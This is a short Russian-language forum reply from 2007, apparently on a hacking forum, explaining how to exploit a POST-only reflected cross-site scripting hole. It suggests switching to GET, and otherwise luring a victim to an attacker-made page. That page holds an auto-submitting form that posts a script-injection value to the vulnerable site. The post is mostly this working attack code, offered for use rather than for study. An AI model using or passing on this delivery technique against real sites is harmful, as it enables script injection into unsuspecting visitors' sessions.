21.08.2007, 12:24
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137
Репутация:
201
|
|
попробуй изменить метод отправки формы на get.
если не даст результата, тебе нужно будет заманивать человека на свою страницу, примерно такого содержания:
Код:
<form method=post action=http://example.com/ id=form1 >
<input name=search value='"><script>alert()</script>'/>
</form>
<script for=form1 event=load >form1.submit()</script>
где action для формы и name для input ввозьмешь с уязвимого сайта.
Последний раз редактировалось V1k; 21.08.2007 в 14:01..
|
|
|